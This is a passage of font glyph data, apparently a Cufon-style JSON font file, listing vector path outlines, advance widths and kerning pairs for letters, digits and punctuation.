-22,"S":-3,"R":-19,"Q":5,"P":-14,"O":10,"N":-14,"M":-14,"L":-14,"K":-14,"J":-12,"I":-5,"H":-3,"G":3,"F":-14,"E":-12,"D":-10,"C":7,"B":-10,"A":17,"9":-3,"8":12,"7":3,"6":10,"5":10,"4":22,"3":5,"2":3,"1":22,"0":7}},{"d":"36,-232v2,-14,-13,-26,-25,-26r0,-7r77,0r0,7v-11,0,-25,11,-25,26r0,199v2,81,-47,102,-116,95r0,-10v73,0,89,-23,89,-89r0,-195","w":95,"k":{"u":7,"o":17,"i":12,"e":17,"a":19,"J":-10,"A":24,"\/":-3,".":17,",":17}},{"d":"189,-265r-106,265r-31,0r111,-239r-133,0r0,-26r159,0","k":{";":36,":":36,"9":26,"8":39,"7":31,"6":33,"5":39,"4":55,"3":39,"2":33,"1":55,"0":29,"\/":36,".":72,"-":46,",":62}},{"d":"297,-184v-17,0,-23,8,-32,35r-50,149r-20,0r-47,-139r-47,139r-20,0r-50,-149v-9,-27,-15,-35,-30,-35r0,-6r62,0r0,6v-21,2,-14,17,-8,35r42,128r43,-139v0,-18,-14,-24,-26,-24r0,-6r63,0r0,6v-21,2,-15,15,-8,35r41,128v14,-50,36,-96,46,-151v2,-14,-12,-7,-11,-18r52,0r0,6","w":296,"k":{"z":5,"s":10,"q":17,"o":17,"k":7,"h":7,"g":14,"e":19,"d":17,"c":10,"b":7,"a":17,";":-5,":":-10,".":43,"-":19,",":43}},{"d":"31,-163v1,-15,-14,-15,-29,-14r0,-7v17,-3,35,-16,52,-13r0,27v0,0,22,-29,59,-29v33,0,86,10,86,101v0,73,-40,101,-88,101v-38,0,-57,-15,-57,-15v0,34,-7,78,26,77r0,7r-75,0r0,-7v13,1,26,-12,26,-26r0,-202xm174,-98v0,-67,-29,-87,-63,-87v-85,0,-50,82,-57,155v52,38,121,29,120,-68","w":208,"k":{"y":12,"x":7,"w":10,"v":7,"q":-5,"p":3,"o":-5,"k":5,"f":7,"d":-5,"c":-10,"b":7}},{"d":"48,-269r-6,81r-10,0r-5,-81r21,0","w":73,"k":{".":67,",":65}},{"d":"261,0r-89,0r0,-8v20,0,19,-14,11,-26r-57,-82v-19,32,-48,59,-60,97v0,5,3,11,16,11r0,8r-79,0r0,-7v23,0,44,-24,51,-34r62,-88r-76,-107v-9,-12,-17,-22,-37,-22r0,-7r79,0r0,7v-18,1,-14,14,-7,23r58,83v20,-32,45,-60,62,-96v0,-6,-4,-10,-13,-10r0,-7r70,0r0,7v-16,0,-30,7,-41,22r-68,98r74,102v4,6,26,29,44,29r0,7","w":257,"k":{"y":19,"v":29,"u":22,"t":17,"s":12,"p":14,"o":26,"m":10,"e":26,"d":19,"c":17,"a":14,"U":10,"S":7,"Q":19,"O":22,"G":19,"C":19,"A":33,"\/":-22,"-":33}},{"d":"154,0r-148,0r0,-6r115,-174r-26,0v-69,0,-76,7,-76,27r-6,0r0,-37r138,0r0,7r-114,173r32,0v64,0,77,-8,77,-37r8,0r0,47","w":159,"k":{"z":-7,"s":-5,"g":-5,"f":-7,"\/":-19}},{"d":"183,-184v-17,0,-22,8,-31,35r-65,193v-10,29,-26,42,-52,42v-45,0,-36,-17,-36,-53r7,0v1,42,57,45,69,7r13,-40r-7,0r-50,-149v-9,-27,-15,-35,-30,-35r0,-6r62,0r0,6v-21,1,-13,18,-8,35r42,128r41,-128v6,-16,9,-34,-7,-35r0,-6r52,0r0,6","w":180,"k":{"w":-5,"s":7,"q":12,"o":12,"g":7,"e":10,"d":7,"c":10,"b":7,"a":10,";":-7,":":-14,".":39,"-":17,",":39}},{"d":"188,-125r-75,0r0,76r-13,0r0,-76r-76,0r0,-14r76,0r0,-74r13,0r0,74r75,0r0,14"},{"d":"193,-98v0,77,-41,101,-89,101v-48,0,-88,-20,-88,-101v0,-77,40,-101,88,-101v48,0,89,20,89,101xm167,-98v0,-71,-29,-91,-63,-91v-34,0,-63,20,-63,91v0,71,29,90,63,90v34,0,63,-19,63,-90","w":207,"k":{"y":12,"x":12,"w":11,"v":10,"t":3,"p":7,"l":3,"k":7,"j":5,"i":3,"f":7,"b":12}},{"d":"13,-7v13,1,26,-12,26,-26r0,-144r-29,0r0,-13r30,0v-5,-56,28,-80,59,-80v25,0,48,9,48,9r0,33r-7,0v0,-18,-19,-32,-40,-32v-36,0,-39,31,-38,70r66,0r0,13r-66,0r0,144v1,16,10,27,31,26r0,7r-80,0r0,-7","w":122,"k":{"z":-12,"y":-17,"x":-14,"v":-17,"u":-19,"t":-14,"r":-12,"q":12,"p":-19,"o":12,"n":-22,"m":-14,"l":-24,"k":-19,"j":-7,"i":-8,"h":-19,"e":8,"d":6,"b":-19,"a":5,";":-18,":":-18,"\/":-12,".":8,"-":5,",":1}},{"d":"257,-132v0,105,-54,137,-120,137v-65,0,-119,-27,-119,-137v0,-105,54,-138,119,-138v66,0,120,28,120,138xm228,-132v0,-99,-41,-127,-91,-127v-49,0,-90,28,-90,127v0,99,41,126,90,126v50,0,91,-27,91,-126","w":272,"k":{"Y":22,"X":22,"W":17,"V":17,"U":3,"T":10,"S":-3,"A":24,";":-10,":":-10,"\/":3,".":31,",":31}},{"d":"86,44v-30,3,-53,2,-53,-41r0,-109v0,-9,-10,-10,-18,-10r0,-7v8,0,18,0,18,-9r0,-109v0,-43,18,-44,53,-42r0,8v-24,0,-30,9,-30,38r0,100v0,8,-6,16,-15,16r0,3v9,0,15,9,15,18r0,98v0,29,6,39,30,39r0,7","w":92},{"d":"161,-133r-9,0r-67,-110r-67,109r-9,0r64,-131r23,0","w":169},{"d":"182,-81v0,55,-39,86,-87,86v-39,0,-67,-9,-67,-9r0,-45r11,0v0,32,30,43,48,43v39,0,67,-20,67,-71v0,-58,-66,-78,-117,-57r0,-131r129,0r-5,26r-112,0r0,88v0,0,17,-5,39,-5v66,0,94,33,94,75","k":{"9":29,"8":26,"7":46,"6":22,"5":41,"4":24,"3":41,"2":36,"1":68,"0":17,"\/":10,".":14,"-":12,",":19}},{"d":"190,-151r-169,0r0,-14r169,0r0,14xm190,-100r-169,0r0,-15r169,0r0,15"},{"d":"139,-26v-12,14,-25,29,-55,29v-39,0,-49,-23,-49,-54r0,-126r-29,0r0,-13r29,0r0,-47r23,-8r0,55r68,0r0,13r-68,0r0,126v-6,44,57,47,77,19","w":126,"k":{"z":-12,"y":-7,"x":-12,"w":-5,"v":-7,"u":-10,"s":-7,"r":-10,"q":7,"p":-10,"o":7,"n":-14,"m":-10,"l":-8,"k":-10,"j":-10,"i":-10,"h":-7,"f":-5,"c":-5,"a":-5,";":-14,":":-14,"\/":-26,".":-14,"-":12,",":-14}},{"d":"155,-47v-1,45,13,50,-58,50v-54,0,-87,-30,-87,-102v0,-72,39,-100,87,-100v70,0,55,-1,57,42r-9,0v0,-12,-12,-31,-47,-31v-31,0,-61,14,-61,89v0,63,25,89,60,89v31,0,51,-17,51,-37r7,0","w":157,"k":{"z":-8,"y":-5,"x":-5,"w":-5,"v":-5,"u":-5,"t":-6,"s":-7,"r":-5,"p":-6,"n":-6,"m":-6,"l":-7,"k":-7,"j":-7,"i":-6,"h":-7,"g":-5,"f":-5,"c":-7,"b":-5,"a":-5,"\/":-18}},{"d":"190,-36r-167,-80r0,-30r167,-80r0,11r-146,84r146,84r0,11"},{"d":"179,-83v0,32,-17,56,-63,60r0,46r-10,0r0,-45v-68,-6,-63,-5,-61,-55r7,0v0,22,18,45,54,44r0,-96v-28,-13,-58,-26,-58,-60v0,-31,21,-53,58,-55r0,-32r10,0r0,32v60,5,51,3,51,46r-7,0v0,-25,-20,-34,-44,-35r0,81v27,13,63,26,63,69xm106,-156r0,-77v-28,2,-36,19,-36,38v0,21,16,30,36,39xm153,-78v0,-27,-16,-37,-37,-46r0,89v24,-4,37,-19,37,-43","k":{"1":60}},{"d":"193,-177v-35,-4,-30,18,-30,47v0,39,-18,70,-72,70v-49,0,-53,3,-53,16v1,16,45,13,67,13v46,0,77,13,77,55v0,44,-56,62,-88,62v-48,0,-88,-13,-88,-59v0,-31,29,-45,29,-45v0,0,-22,-5,-22,-26v0,-13,13,-25,36,-25v0,0,-28,-13,-28,-61v0,-87,114,-84,134,-37v-2,-26,12,-35,38,-32r0,22xm138,-129v0,-48,-24,-59,-47,-59v-25,0,-47,11,-47,59v0,45,22,57,47,57v26,0,47,-12,47,-57xm157,27v10,-43,-63,-43,-113,-41v0,0,-13,20,-13,41v0,38,30,48,63,48v25,0,63,-10,63,-48","w":188,"k":{"y":-5,"t":-5,"r":-5,"o":5,"j":-17,"g":-5,"e":5,"\/":-17}},{"d":"37,-154v0,52,109,36,109,102v0,32,-21,55,-76,55v-70,0,-57,-5,-58,-50r7,0v0,19,16,39,51,39v32,0,50,-16,50,-41v-1,-57,-105,-41,-105,-100v0,-30,24,-50,63,-50v62,0,57,-1,56,42r-7,0v0,-24,-21,-32,-48,-32v-33,0,-42,16,-42,35","w":149,"k":{"z":-3,"w":3,"v":3,"t":3,"c":-7,"b":3,"a":-7,"\/":-14}},{"d":"233,-33v-2,15,13,27,25,26r0,7r-77,0r0,-7v43,-2,19,-81,25,-125r-143,0v6,45,-18,123,26,125r0,7r-78,0r0,-7v13,1,26,-12,26,-26r0,-199v1,-14,-14,-26,-26,-26r0,-7r78,0r0,7v-41,1,-22,70,-26,111r143,0v-4,-41,15,-109,-25,-111r0,-7r77,0r0,7v-11,0,-25,11,-25,26r0,199","w":266,"k":{"z":5,"y":12,"q":10,"o":10,"l":-5,"e":10,"a":10,"B":-5,"\/":-12}},{"d":"186,-133v0,135,-81,151,-165,129r0,-45r11,0v0,27,18,43,50,43v40,0,75,-22,75,-135v0,0,-14,42,-65,42v-48,0,-80,-32,-80,-84v0,-63,43,-87,87,-87v72,0,87,59,87,137xm154,-185v0,-50,-26,-74,-57,-74v-31,0,-56,19,-56,74v0,55,25,73,56,73v31,0,57,-23,57,-73","k":{"9":10,"8":19,"7":41,"6":10,"5":26,"4":19,"3":33,"2":31,"1":59,"0":5,"\/":10,".":12,"-":7,",":19}},{"d":"68,45r-52,0r0,-328r52,0r0,8r-29,0r0,312r29,0r0,8","w":84},{"d":"37,-232v1,-15,-16,-26,-29,-26r0,-7r97,0v76,0,101,28,101,68v0,70,-61,85,-143,81v4,41,-15,109,26,109r0,7r-78,0r0,-7v13,1,26,-12,26,-26r0,-199xm177,-195v0,-37,-24,-58,-72,-58v-25,0,-42,5,-42,5r0,119v66,5,114,-11,114,-66","w":212,"k":{"y":-5,"v":-5,"s":5,"o":12,"i":-5,"g":10,"e":12,"d":12,"c":5,"a":12,"Z":5,"Y":18,"X":17,"W":7,"V":12,"T":-7,"S":-3,"R":5,"P":5,"N":5,"M":5,"L":5,"K":5,"D":7,"B":3,"A":41,";":-10,":":-10,"\/":17,".":48,"-":14,",":48}},{"d":"167,-120v11,7,-9,19,-12,29v-37,52,-90,-64,-127,0v-11,-7,9,-19,12,-29v37,-52,89,64,127,0","w":198},{"d":"85,-269r-6,81r-10,0r-5,-81r21,0xm48,-269r-6,81r-10,0r-5,-81r21,0","w":111,"k":{".":103,",":111}},{"d":"183,-184v-17,0,-22,8,-31,35r-51,149r-20,0r-50,-149v-9,-27,-15,-35,-30,-35r0,-6r62,0r0,6v-21,1,-13,19,-8,35r42,128r41,-128v6,-15,9,-35,-7,-35r0,-6r52,0r0,6","w":189,"k":{"z":7,"s":13,"q":19,"o":19,"k":7,"h":7,"g":14,"e":19,"d":15,"c":14,"b":7,"a":17,";":-10,":":-10,".":43,"-":12,",":43}},{"d":"175,0r-56,0r0,-8v11,2,14,-10,7,-16r-40,-62v-15,24,-33,45,-45,72v0,4,3,6,13,6r0,8r-54,0r0,-7v45,-12,52,-61,78,-91v-25,-28,-33,-73,-74,-86r0,-6r58,0r0,6v-13,1,-12,7,-5,16r33,51v12,-21,31,-38,39,-62v1,-7,-13,-1,-10,-11r51,0r0,6v-15,0,-24,7,-30,16r-42,63r52,78v3,5,16,20,25,20r0,7","w":175,"k":{"s":5,"q":14,"o":14,"i":-7,"f":-7,"e":7,"d":7,"c":5,"a":5,"\/":-22,"-":24}},{"d":"112,-33v-3,17,16,27,30,26r0,7r-87,0r0,-7v14,1,31,-9,31,-26r0,-211r-37,10r0,-11r63,-25r0,237","k":{"s":65,"p":55,"a":67,":":60,"9":69,"8":79,"7":86,"6":69,"5":75,"4":79,"3":79,"2":65,"1":90,"0":60,"\/":31,".":60,"-":69,",":60,"'":82,"\"":77}},{"d":"180,39v-2,15,13,27,25,26r0,7r-74,0r0,-7v33,1,26,-45,26,-80v0,0,-21,18,-53,18v-48,0,-89,-20,-89,-101v0,-114,84,-111,142,-89v8,-3,14,-15,23,-10r0,236xm157,-32r0,-126v0,0,-17,-30,-53,-30v-34,0,-63,19,-63,90v0,62,29,86,63,86v32,0,53,-20,53,-20","w":207,"k":{"u":6,"o":10,"j":-24,"a":8,"-":5}},{"d":"68,45r-52,0r0,-9r29,0r0,-311r-29,0r0,-8r52,0r0,328","w":84},{"d":"188,-205v0,37,-38,64,-71,64r-10,80r-10,0r-9,-87v48,2,72,-26,71,-55v0,-32,-14,-56,-47,-56v-28,0,-54,11,-54,43r-10,0r0,-45v0,0,27,-9,72,-9v48,0,68,26,68,65xm120,-13v0,10,-9,16,-18,16v-11,0,-18,-7,-18,-16v0,-9,8,-17,17,-17v11,0,19,7,19,17","w":191},{"d":"37,12v0,-26,-23,0,-23,-31v0,-10,7,-16,18,-16v10,0,19,11,19,29v0,34,-13,60,-27,56v0,0,13,-25,13,-38","w":67,"k":{"1":31,"'":77,"\"":77}},{"d":"184,-66v0,54,-42,71,-82,71v-39,0,-81,-14,-81,-71v0,-40,27,-69,67,-69v-30,-5,-56,-27,-56,-68v0,-51,38,-67,74,-67v36,0,71,13,71,67v0,28,-22,55,-53,61v31,13,60,32,60,76xm150,-203v0,-41,-18,-56,-44,-56v-28,0,-47,17,-47,53v0,43,44,57,50,57v24,0,41,-26,41,-54xm155,-66v0,-79,-105,-79,-106,0v0,44,24,60,53,60v29,0,53,-16,53,-60","k":{"9":17,"8":22,"7":39,"6":17,"5":31,"4":24,"3":33,"2":29,"1":54,"0":12,"\/":3,".":12,"-":12,",":10}},{"d":"37,-232v1,-14,-14,-26,-26,-26r0,-7r182,0r0,53r-10,0v0,-32,-4,-43,-68,-43v-39,0,-52,6,-52,15r0,93v57,1,84,-6,78,-39r9,0r0,90r-9,0v4,-33,-20,-41,-78,-40v9,59,-32,124,54,124v58,0,76,-8,76,-53r9,0r0,65r-191,0r0,-7v13,1,26,-12,26,-26r0,-199","w":207,"k":{"\/":-22,".":-7,"-":12}},{"d":"63,-265v1,72,1,143,-9,204r-10,0v-8,-63,-8,-133,-7,-204r26,0xm67,-13v0,9,-9,16,-18,16v-11,0,-18,-7,-18,-16v0,-9,8,-17,17,-17v11,0,19,7,19,17","w":97},{"d":"211,-232v2,-14,-13,-26,-25,-26r0,-7r67,0r0,7v-11,0,-25,11,-25,26r0,232r-16,0r-159,-240r0,207v-2,15,13,27,25,26r0,7r-67,0r0,-7v13,1,26,-12,26,-26r0,-199v1,-14,-15,-26,-27,-26r0,-7r59,0r142,218r0,-185","w":257,"k":{"y":7,"u":7,"o":14,"g":10,"e":14,"a":12,"Z":10,"Y":7,"X":7,"W":5,"T":-5,"A":19,"\/":-3,".":14,",":14}},{"d":"65,-242v0,9,-8,16,-17,16v-10,0,-17,-7,-17,-16v0,-9,7,-15,16,-15v10,0,18,5,18,15xm36,-163v1,-14,-13,-15,-28,-14r0,-7v17,-3,35,-16,51,-13r0,184v2,72,-40,90,-101,84r0,-7v64,0,78,-19,78,-77r0,-150","w":90,"k":{"y":10,"x":7,"w":5,"v":5,"u":5,"t":10,"s":5,"r":7,"o":10,"k":5,"i":10,"e":10,"a":12}},{"d":"170,-46v1,-31,4,-67,-25,-66r0,-7r76,0r0,7v-41,1,-22,70,-26,112v-15,2,-6,-7,-25,-7v-13,0,-31,12,-77,12v-48,0,-77,-29,-77,-75v0,-41,27,-71,69,-71v-29,0,-52,-25,-52,-62v0,-51,45,-65,80,-65v35,0,64,9,64,9r0,45r-10,0v0,-32,-27,-42,-54,-42v-37,0,-54,21,-54,53v0,31,13,59,62,55r0,13v-53,-3,-78,21,-78,65v0,48,32,64,62,64v48,0,65,-22,65,-40","w":227},{"d":"105,31v-48,0,-88,-46,-88,-156v0,-105,40,-157,88,-157r0,7v-34,0,-63,51,-63,150v0,99,29,149,63,149r0,7","w":126},{"w":104},{"d":"102,-7v27,2,27,-33,25,-64r-126,0r138,-199r14,0r0,184r44,0r0,15r-44,0v-2,31,-2,65,26,64r0,7r-77,0r0,-7xm127,-86r0,-140r-99,140r99,0","k":{"9":22,"8":22,"7":43,"6":17,"5":29,"4":17,"3":26,"2":22,"1":50,"0":12,"\/":-3,".":12,"-":7,",":14}},{"d":"128,-96r-110,0r0,-13r110,0r0,13","w":145,"k":{"z":10,"y":22,"x":29,"w":22,"t":14,"s":10,"r":10,"p":12,"k":-5,"Z":31,"Y":69,"X":46,"W":32,"V":50,"T":59,"S":17,"R":7,"P":7,"L":10,"F":12,"E":10,"A":24,"9":10,"8":10,"7":48,"6":5,"5":24,"4":5,"3":36,"2":39,"1":58}},{"d":"63,-33v-2,15,13,27,26,26r0,7r-78,0r0,-7v13,1,26,-12,26,-26r0,-199v1,-14,-14,-26,-26,-26r0,-7r78,0r0,7v-12,0,-26,11,-26,26r0,199","w":95,"k":{"z":5,"y":10,"w":7,"v":7,"s":10,"q":10,"o":10,"m":-5,"l":-10,"g":7,"e":7,"a":10,"Z":5,"T":-5,"S":-5,"N":3,"M":5,"J":-7,"I":-7,"F":-5,"D":-5,"B":-5,"\/":-14}},{"d":"37,-232v2,-15,-17,-27,-29,-26r0,-7v85,3,198,-18,198,67v0,51,-41,71,-78,77r103,110v4,2,11,3,16,3r0,8r-45,0r-103,-118r-36,0v4,42,-16,111,26,111r0,7r-78,0r0,-7v13,1,26,-12,26,-26r0,-199xm177,-197v0,-36,-28,-56,-72,-56v-26,0,-42,5,-42,5r0,118v62,2,114,-2,114,-67","w":224,"k":{"u":-6,"p":5,"j":-10,"g":-7,"f":7,"d":-5,"b":-7,"Z":-10,"Y":15,"W":15,"V":15,"S":-10,"R":3,"P":3,"M":3,"J":-10,"\/":-46,".":-24,"-":11}},{"d":"51,-160v0,9,-8,16,-18,16v-11,0,-18,-7,-18,-16v0,-9,8,-17,17,-17v11,0,19,7,19,17xm51,-26v0,10,-8,17,-18,17v-11,0,-18,-8,-18,-17v0,-9,8,-16,17,-16v11,0,19,6,19,16","w":67,"k":{"1":43}},{"d":"89,-258v-12,0,-26,11,-26,26r0,193v0,14,13,26,53,26v54,0,79,-8,79,-53r9,0r0,66r-193,0r0,-7v13,1,26,-12,26,-26r0,-199v1,-14,-14,-26,-26,-26r0,-7r78,0r0,7","w":206,"k":{"y":14,"w":14,"v":14,"t":7,"g":-5,"b":7,"a":-5,"Y":41,"X":10,"W":41,"V":41,"U":22,"T":33,"S":-5,"R":5,"Q":14,"P":5,"O":14,"N":5,"M":5,"L":7,"K":5,"J":5,"H":5,"G":14,"F":5,"E":5,"D":5,"C":14,"A":10,"\/":-22,".":-7}},{"d":"177,0r-165,0r0,-7v35,-49,129,-148,129,-201v0,-30,-15,-51,-51,-51v-31,0,-53,11,-53,43r-11,0r0,-45v0,0,29,-9,74,-9v48,0,70,26,70,63v0,59,-93,131,-129,183r65,0v54,0,61,-5,61,-50r10,0r0,74","k":{"9":26,"8":33,"7":46,"6":29,"5":39,"4":31,"3":41,"2":31,"1":62,"0":22,"\/":7,".":17,"-":39,",":12}},{"d":"34,-234v0,-14,-14,-15,-29,-14r0,-6v17,-3,37,-18,52,-13r0,97v0,0,22,-29,60,-29v36,0,85,12,85,101v0,77,-44,101,-88,101v-38,0,-57,-15,-57,-15v-12,3,-29,23,-36,7v0,0,13,-6,13,-32r0,-197xm176,-98v0,-66,-27,-87,-62,-87v-86,0,-50,81,-57,154v50,40,120,31,119,-67","w":215,"k":{"y":10,"x":7,"w":7,"v":7,"b":10}},{"d":"213,-232v1,-14,-14,-26,-25,-26r0,-7r65,0r0,7v-11,0,-25,11,-25,26r0,133v0,79,-43,103,-94,103v-51,0,-95,-20,-95,-103r0,-133v1,-15,-16,-26,-28,-26r0,-7r80,0r0,7v-12,0,-26,12,-26,26r0,133v0,71,34,89,74,89v40,0,74,-21,74,-89r0,-133","w":259,"k":{"z":10,"y":10,"x":10,"w":12,"v":10,"u":10,"t":12,"s":14,"r":14,"p":14,"n":10,"m":10,"g":12,"e":12,"d":5,"a":17,"Z":8,"Y":5,"X":10,"W":7,"V":5,"U":5,"R":5,"Q":5,"O":5,"N":5,"M":5,"L":5,"K":3,"G":7,"F":3,"E":3,"D":5,"C":7,"A":36,"\/":5,".":33,",":33}},{"d":"51,-160v0,9,-8,16,-18,16v-11,0,-18,-7,-18,-16v0,-9,8,-17,17,-17v11,0,19,7,19,17xm37,12v0,-26,-23,0,-23,-31v0,-10,7,-16,18,-16v10,0,19,11,19,29v0,34,-13,60,-27,56v0,0,13,-25,13,-38","w":67},{"d":"37,-232v1,-14,-14,-26,-26,-26r0,-7r186,0r0,54r-9,0v0,-32,-9,-42,-73,-42v-39,0,-52,5,-52,14r0,92v57,1,84,-6,78,-39r9,0r0,90r-9,0v4,-33,-20,-41,-78,-40r0,103v-2,16,14,27,27,26r0,7r-79,0r0,-7v13,1,26,-12,26,-26r0,-199","w":192,"k":{"y":6,"x":10,"w":7,"u":5,"s":19,"r":12,"o":22,"j":-7,"e":17,"d":13,"a":22,"Z":-3,"Y":-5,"X":-7,"W":-10,"T":-14,"S":-5,"R":-5,"Q":5,"P":-5,"O":5,"L":-5,"K":-5,"J":-5,"I":-5,"H":-7,"G":3,"F":-5,"E":-7,"D":-7,"C":3,"B":-7,"A":36,"\/":5,".":33,"-":12,",":39}},{"d":"292,-33v-2,15,13,27,26,26r0,7r-78,0r0,-7v13,1,26,-12,26,-26r0,-202r-99,220r-18,0r-96,-224r0,206v-2,15,13,27,25,26r0,7r-67,0r0,-7v13,1,26,-12,26,-26r0,-199v1,-14,-14,-26,-26,-26r0,-7r60,0r92,218r97,-218r58,0r0,7v-12,0,-26,11,-26,26r0,199","w":326,"k":{"y":7,"t":5,"s":10,"o":12,"l":-5,"g":5,"e":10,"c":7,"a":7,"W":5,"R":-5,"P":-5,"E":-5,"D":-5,"B":-5,"\/":-14}},{"d":"177,-29v0,0,-24,32,-84,32v-13,0,-80,-1,-80,-100v0,-64,32,-103,87,-103v45,0,77,28,77,92r-139,0v-3,120,91,106,139,67r0,12xm150,-121v0,-42,-21,-68,-57,-68v-40,0,-54,35,-54,68r111,0","w":181,"k":{"y":7,"w":7,"v":7,"r":4,"\/":-18}},{"d":"120,-199v0,53,-25,68,-52,68v-27,0,-51,-13,-51,-68v0,-53,24,-69,51,-69v27,0,52,14,52,69xm214,-269r-145,269r-17,0r146,-269r16,0xm250,-66v0,53,-25,69,-52,69v-27,0,-51,-14,-51,-69v0,-53,24,-69,51,-69v27,0,52,14,52,69xm99,-199v0,-47,-14,-61,-31,-61v-17,0,-31,14,-31,61v0,47,14,59,31,59v17,0,31,-12,31,-59xm229,-66v0,-47,-14,-60,-31,-60v-17,0,-31,13,-31,60v0,47,14,60,31,60v17,0,31,-13,31,-60","w":264},{"d":"226,-15v0,0,-20,19,-84,19v-77,0,-124,-30,-124,-139v0,-107,59,-135,124,-135v54,0,76,8,76,8r0,45r-10,0v0,-23,-17,-42,-65,-42v-43,0,-96,16,-96,124v0,109,56,127,95,127v64,0,74,-28,74,-54r10,0r0,47","w":244,"k":{"y":8,"o":5,"e":5,"Z":5,"Y":12,"X":7,"W":7,"V":14,"U":7,"T":3,"S":3,"Q":10,"O":10,"J":-7,"G":12,"F":3,"E":5,"D":7,"C":12,"B":7,"A":17,";":-5,":":-5,"\/":-5}},{"d":"104,-240r-38,17r38,17r-6,11r-34,-23r4,41r-13,0r3,-41r-33,24r-7,-11r37,-18r-36,-18r6,-11r33,24r-3,-41r13,0r-4,41r34,-23","w":102},{"d":"263,0r-83,0r0,-7v26,0,18,-31,11,-50r-19,-58r-86,0v-7,27,-23,64,-25,92v0,10,10,16,21,16r0,7r-76,0r0,-7v13,0,28,-9,42,-50r72,-208r29,0r71,208v11,31,21,50,43,50r0,7xm167,-129r-38,-115r-38,115r76,0","w":263,"k":{"z":5,"y":24,"x":22,"w":26,"v":26,"u":12,"t":19,"s":12,"r":17,"q":14,"p":10,"o":14,"g":10,"f":22,"e":14,"d":14,"c":14,"b":14,"a":14,"Y":39,"X":22,"W":39,"V":39,"U":24,"T":22,"S":6,"Q":22,"O":22,"G":22,"C":22,"A":23,";":-3,":":3,"\/":-23,".":-7,"-":19,",":-7}},{"d":"69,-7v16,2,30,-12,30,-29r0,-216v-55,-1,-91,3,-85,42r-10,0r0,-55r216,0r0,55r-10,0v4,-39,-30,-43,-85,-42r0,216v-2,16,13,31,29,29r0,7r-85,0r0,-7","w":222,"k":{"z":24,"y":14,"x":17,"w":14,"v":14,"u":14,"s":41,"r":19,"p":14,"o":40,"n":12,"m":14,"g":42,"e":39,"d":31,"c":37,"a":39,"Z":5,"Y":3,"V":5,"T":-7,"S":-3,"R":5,"Q":14,"O":14,"N":5,"M":5,"G":12,"C":14,"A":32,";":19,":":19,"\/":5,".":41,"-":59,",":41}},{"d":"36,-163v0,-13,-14,-15,-29,-14r0,-7v17,-3,35,-16,52,-13r0,27v0,0,12,-29,46,-29v39,1,24,17,27,45r-9,0v0,-14,-8,-29,-25,-29v-61,0,-33,91,-39,150v-1,14,13,27,26,26r0,7r-75,0r0,-7v13,1,26,-12,26,-26r0,-130","w":135,"k":{"z":-4,"y":-5,"x":-3,"w":-3,"v":-5,"u":-10,"t":-5,"s":4,"r":-7,"q":10,"p":-5,"o":10,"n":-7,"m":-7,"l":5,"k":7,"j":-12,"i":-5,"h":5,"g":7,"f":3,"e":7,"d":7,"c":7,"b":5,"a":12,";":-14,":":-14,".":24,"-":22,",":24}},{"d":"204,-55v0,-29,-1,-58,-26,-57r0,-7r78,0r0,7v-38,0,-24,59,-26,98v0,0,-21,18,-88,18v-77,0,-124,-30,-124,-139v0,-107,59,-135,124,-135v57,0,82,8,82,8r0,45r-11,0v0,-32,-22,-42,-70,-42v-43,0,-96,16,-96,124v0,109,56,128,95,128v49,0,62,-12,62,-48","w":254,"k":{"Y":12,"X":12,"W":12,"V":12,"T":5,"S":-7,"P":-5,"L":-5,"J":-7,"I":-5,"C":-5,"A":11,"\/":-14,"-":-12}},{"d":"184,-9v0,0,-16,12,-32,12v-20,0,-23,-19,-23,-19v0,0,-25,19,-60,19v-36,0,-56,-17,-56,-52v0,-55,56,-70,114,-70v2,-43,-8,-67,-46,-67v-31,0,-42,14,-42,33r-9,0r0,-37v0,0,19,-9,58,-9v39,0,63,12,63,68r0,90v1,35,13,29,30,26xm127,-28r0,-80v-57,0,-88,16,-88,53v0,65,75,40,88,27","w":174,"k":{"y":10,"w":10,"v":7,"t":3,"\/":-24,".":-7}},{"d":"193,-82v0,63,-44,87,-87,87v-72,0,-87,-59,-87,-137v0,-136,76,-151,160,-129r0,45r-11,0v0,-28,-18,-43,-50,-43v-41,0,-70,18,-70,134v0,0,13,-41,65,-41v48,0,80,32,80,84xm164,-80v0,-55,-25,-73,-56,-73v-31,0,-57,23,-57,73v0,50,26,74,57,74v31,0,56,-19,56,-74","k":{"9":14,"8":14,"7":33,"6":10,"5":26,"4":12,"3":29,"2":22,"1":55,"0":5,"\/":3,".":5,"-":5,",":7}},{"d":"279,-135v0,46,-18,123,25,128r0,7r-73,0r0,-7v43,-3,25,-81,25,-125v0,-36,-12,-54,-39,-54v-75,0,-44,86,-50,153v-1,14,13,27,25,26r0,7r-73,0r0,-7v43,-3,25,-81,25,-125v0,-36,-13,-54,-40,-54v-75,0,-44,86,-50,153v-2,14,12,27,24,26r0,7r-72,0r0,-7v12,1,25,-12,25,-26r0,-130v0,-13,-13,-15,-28,-14r0,-7v17,-3,35,-16,51,-13r0,27v0,0,16,-29,51,-29v30,0,49,12,57,31v0,0,18,-31,56,-31v43,0,61,23,61,64","w":311,"k":{"z":7,"y":12,"w":12,"v":12,"u":5,"t":12,"s":12,"r":10,"q":7,"p":5,"o":7,"n":7,"m":7,"l":10,"k":12,"j":12,"i":12,"h":7,"g":7,"f":12,"e":5,"b":12,"a":10}},{"d":"177,-70v0,46,-33,75,-81,75v-39,0,-67,-9,-67,-9r0,-45r11,0v0,32,30,43,56,43v34,0,53,-32,53,-64v1,-44,-29,-68,-81,-65r0,-13v50,3,75,-26,75,-57v0,-32,-15,-54,-48,-54v-28,0,-53,11,-53,43r-10,0r0,-45v0,0,23,-9,68,-9v48,0,71,24,71,62v0,37,-38,67,-68,67v43,0,74,30,74,71","k":{"9":24,"8":26,"7":48,"6":24,"5":39,"4":22,"3":43,"2":36,"1":65,"0":19,"\/":12,".":22,"-":17,",":19}},{"d":"39,-232v1,-15,-16,-26,-28,-26r0,-7v78,4,193,-21,192,59v0,44,-40,62,-67,64v27,3,85,7,85,67v0,97,-116,72,-208,75r0,-7v13,1,26,-12,26,-26r0,-199xm176,-206v0,-26,-17,-47,-69,-47v-23,0,-42,5,-42,5r0,100v62,4,111,-9,111,-58xm193,-74v0,-46,-58,-67,-128,-61v7,58,-28,124,52,124v40,0,76,-16,76,-63","w":233,"k":{"o":3,"Z":12,"Y":36,"X":24,"W":29,"V":36,"U":14,"T":10,"S":3,"R":12,"Q":7,"P":10,"O":7,"N":14,"M":14,"L":12,"K":12,"J":3,"I":12,"H":10,"G":5,"F":7,"E":7,"D":12,"C":5,"B":12,"A":24,"\/":-5,".":19,"-":-12,",":14}},{"d":"1